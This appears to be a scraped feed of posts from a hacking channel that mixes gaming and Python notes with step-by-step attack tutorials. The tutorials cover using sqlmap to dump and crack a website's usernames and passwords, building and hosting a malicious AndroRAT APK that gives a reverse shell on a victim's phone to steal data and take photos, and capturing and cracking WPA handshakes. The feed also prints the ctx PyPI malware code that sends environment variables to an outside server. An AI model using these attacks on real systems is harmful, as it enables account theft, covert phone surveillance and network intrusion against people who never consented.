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📢ALERT 📢 Ngrok has updated their free servers so now you can host your website online without paying anyone Simple enter your termux $ ngrok http 80 (or any even 443) Your website will be hosted on ngrok ENJOY 😉 Hacking/programming/coding:: @V3rtualfreenet
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Another streamed gameplay of garena free fire , if you're a noob and wanna learn how to have noobs for breakfast this is a vid for you
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The wifi cracking tutorial coming tomorrow 14:00 I swear I'll drop it , and I do apologize for the delay I've been occupied with other thing😅 @V3rtualfreenet
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HERES THE NEW VIDMATE APK $ download movies $ download apks $ download videos $ 😒don't download porn you disgusting people😒 Link ::
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"How to hack accounts in a website" $ okay so firstly I tested out this method on a website you can hack "it's legal" it's called 'getboo' so search it up and hack it 😉 $ "let hack then , every user and their password is ours" >Now go to the sites login where it asks for username and password " were gonna target 'asd' " On username input :: asd On password input :: asd (This above is incorrect) Go to top right corner of your computer and tap there so the drop down appears...then tap "web developer" then after that tap "network" Then tap login with those credentials I gave you "asd" then you'll see "login.php" tap that On the left tap on response it'll say user does not exist (like I said) but woah now we can see what happens in secret when you're logging in you can also see code 😆these are all entry points for us as hackers😈 Now let's go deeper in the hack > go to your terminal aka(termux, kali linux etc) > and install sqlmap if you haven't you don't have it install it you can find it easy via Google search > were gonna use splmap to DUMP out all the "usernames and passwords" of the website 😳 >in your terminal type in "sqlmap" (click to copy) > then type in "sqlmap -h" (click to copy) to see options were given > Now type in "sqlmap -u "(input link of website login.php)" *if you're idiot let me make it simple input there not just the link of website but a attack point like "" not just a regular link were targeting peoples logins so make sure you have link of login page* > type in:: sqlmap -u "(input link of website login.php) --data *(put request payload you found on requests on web developer)it should be a token* (The --data is to specify the data we received from request payload and set it to be attacked... I'll type again because some of yall have 1 iQ😑 from web developer on requests copy the request payload that starts with 'token=' read this again if you have no brain you'll understand... copy that token after --data in your terminal > then run the command I just gave you sqlmap will tell you the token you inserted has a anti-CRSF token tap "n" and run it >it'll ask you somethin else I won't explain it this is an essay now just click "y" and run and click "y" again and run The site is not injectable okay😐 SIKE GOTCHA BISH😝 > click "forgot password on website" > input on username "asd" on email input "asd" and run that simple > and since you have web developer open go to requests and copy the payload request again Run this > sqlmap -u "link of forgot password of that website" --data *request payload you just copied* (click to copy) > then you'll be asked a question on sqlmap click "Y" >THATS IT WERE IN 😇 Now let's get those usernames and passwords Type this in terminal >sqlmap -u *link of forgot password of that website* --data *request payload you just copied* --dbs(click to copy) (The --dbs is meant to DUMP out all the data) Now run that command above and you'll be asked a yes or no tap "y" now next you'll see a list since I targeted getboo I'll see it in the database so if you're targeting another site 😡THAT YOU HAVE PERMISSION TO HACK😡 Put in that☺️ Now type this in terminal:; >sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --tables (click to copy) (I put getboo there since it was on the database plus it's what I hacked/targetted and the --tables is to see all tables of data in the website) Now run the command >sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --dump-all (click to copy) " the new thing I just added --dump-all is simple it all DUMP everything inside the database including passwords...everything bro" Now it'll ask questions first one Click "y" Second one click "n" Third one will ask if you wanna crack click "y" and click enter on that If it asks for password suffixes click "n" THEN ITLL START CRACKING THE PASSWORD FUSE 👏 After click "y" boom all the usernames and passwords there Confused ? Need help Dm me =@V3rtualfreenet
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How to hack gain control of any mobile device using a apk with malicious code $ things you need:: 1.Any terminal eg(termux,parrot os,kali) 2. Internet connection $ Now let's hàck:: > go to your terminal and run this command:: git clone (tap to copy)✌ > after you've run that run this one next: cd AndroRAT/ (tap to copy) then run this :: ls to list the contents of the directory > you will see requirements.txt so it has dependencies we need to ensure the command works so run this simple command :: pip install -r requirements.txt (tap to copy) "It will install dependencies".... > Now it's time to create a malicious apk 😈 > run this command: python3 --build -i -p 4444 -o vertualfreenet.apk (tap to copy) remove vertualfreenet.apk and name the apk whatever you want 😉 📢: the -i stands for IP address were using i chose cuz that's the IP address of my termux machine if you're using kali or parrot os run this command > ifconfig (tap to copy) it will show ip address of your terminal pls termux users check your ip address using this command so you ensure the address you're using is of your own machine Moving on..... Run this:: ls -lt (tap to copy) with this command it'll show you the apk you just created , simple Now let's host a listener so we know if someone install your apk > run this command to host:: python3 --shell -1 -p 4444 (tap to copy) "Now it will wait for connections" Now jump into a second session by sliding on the left side of your termux then you'll see new session tap that >on that new session run this command:: sudo systemctl status apache2.service (tap to copy) this command will start a service for you "FOR FREE"🥳 > let's start our server shall we: sudo systemctl start apache2.service (tap to copy) this command will start your server >run this command:: cd AndroRAT/ (tap to copy) >run this command:: sudo cp vertualfreenet.apk var/www/html (tap to copy) this will copy and paste your malicious apk in the server You just started "change vertualfreenet.apk to the name of your malicious apk if you haven't idiot" Now send this to your victim:: > (tap to copy) "change name of my apk to yours" Now if the victim installed your apk , swipe on the left side of your termux and go back to the first session we did...the one we exited will tell you "hello welcome to reverse shell of androRAT" That's it we're in😈 Now type in this:: help (tap to copy) The help will show you how to steal info from the victims take pictures of them without knowing steal info from their phone etc.... Disclaimer:: This information is for educational purposes only I do not encourage any misuse of this knowledge only use this Info on yourself or if you gain permission to use it on someone @V3rtualfreenet
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HOW TO HACK WIFI IN 3 WAYS   First, start the monitor mode on our wireless adaptor. airmon-ng start wlan0 Now the monitor mode is enabled with the name wlan0mon. and then with the following command start listening to all the available wifi connections: airodump-ng wlan0mon   First, start the monitor mode on our wireless adaptor. airmon-ng start wlan0 Now the monitor mode is enabled with the name wlan0mon. and then with the following command start listening to all the available wifi connections: airodump-ng wlan0mon After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c. Now we have to listen to a specific channel on which the target is present . Now run command: airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon -c == channel number of the target (2 in my case , see the CH column) –bssid == MAC address of the target AP –write == name of the capture file Now wait till the WPA handshake is captured and then hit crtl^c. Now a file named sommay-01.cap will be generated 1. PYRIT First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command: pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough -i == path to the input file in our case  it is the path to dictionary -r ==  path to the captured fle which ( in our case it is sommay-01.cap) attack_passthrough == this options is to specify that a dictionary attack is to be performed As you can see it has successfully cracked the password. 2.OCLHASHCAT First of all download oclhashcat from its official website: First we have to convert the .cap file we captured with airodump-ng previously  to .hccap with aircrack-ng  by command: aircrack-ng sommay-01.cap -J sommay-01 -J == the path to the output file with extension .hccap Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command: ./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst In above command if you are using 32 bit system replace 64 with 32. -m is the hash type  which is 2500 for WPA/WPA2 cracking then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password. 3.COWPATTY For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command: genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY -f == path to the dictionary file -d == name of the output dictionary -s == ESSID(Name) of the target AP(The name should be identical to the target AP) Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process. Now run command : cowpatty  -d cowpatty_dict -r sommay-01.cap -s SOMMAY -d == path to dictionary we generated with genpmk -r == path to the capture file we generated with airodump-ng -s == ESSID of the target AP(The name should be identical to the target AP) hacking/cracking/programming:: @V3rtualfreenet
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The CTX Malicious package 📦 ctx is a malicious package. Versions 0.2.2 and 0.2.6 were released with malicious code that sends AWS tokens to a URL, version 0.1.2 was also republished to Pypi with the malicious code included. In addition all other versions of the library were removed from Pypi. Pypi have since removed all versions of this library from the registry. The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code which collected the content of os.environ.items() when instantiating Ctx objects. The captured environment variables were sent as a base64 encoded query parameter to a heroku application running at If you installed this package between 2022-05-14T19:18:36Z and 2022-05-24T10:07:17Z and your environment variables contain sensitive data like passwords and API keys (like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY), I advise you rotate your passwords and keys, then perform an audit to determine if they were exploited cuz dude they might be. The code is like this 👀 def init(self): self.sendRequest() . . # code that performs dict access . # please DO NOT RUN THIS CODE ! def sendRequest(self): string = "" for _, value in environ.items(): string += value+" " message_bytes = string.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64_message = base64_bytes.decode('ascii') response = requests.get(""+base64_message) This code will leak every data on your machine or data base to the attacker , so yeah before you code garbage 🗑do some research Vanurabilities/coding/hacking: @V3rtualfreenet
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Just introduced the morning with playing: Garou mark of the wolves Video to watch here::
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The "for" statement in python The "for" statement is used to iterate over the elements of a sequence (such as a string, tuple or list) or other iterable object: for_stmt ::= "for" target_list "in" expression_list ":" suite ["else" ":" suite] The expression list is evaluated once; it should yield an iterable object. An iterator is created for the result of the "expression_list". The suite is then executed once for each item provided by the iterator, in the order returned by the iterator. Each item in turn is assigned to the target list using the standard rules for assignments (see Assignment statements), and then the suite is executed. When the items are exhausted (which is immediately when the sequence is empty or an iterator raises a "StopIteration" exception), the suite in the "else" clause, if present, is executed, and the loop terminates. A "break" statement executed in the first suite terminates the loop without executing the "else" clause’s suite. A "continue" statement executed in the first suite skips the rest of the suite and continues with the next item, or with the "else" clause if there is no next item. The for-loop makes assignments to the variables in the target list. This overwrites all previous assignments to those variables including those made in the suite of the for-loop: for i in range(10): print(i) i = 5 # this will not affect the for-loop # because i will be overwritten with the next # index in the range Names in the target list are not deleted when the loop is finished, but if the sequence is empty, they will not have been assigned to at all by the loop. Hint: the built-in function "range()" returns an iterator of integers suitable to emulate the effect of Pascal’s "for i := a to b do"; e.g., "list(range(3))" returns the list "[0, 1, 2]". Programming/coding/hacking:: @V3rtualfreenet
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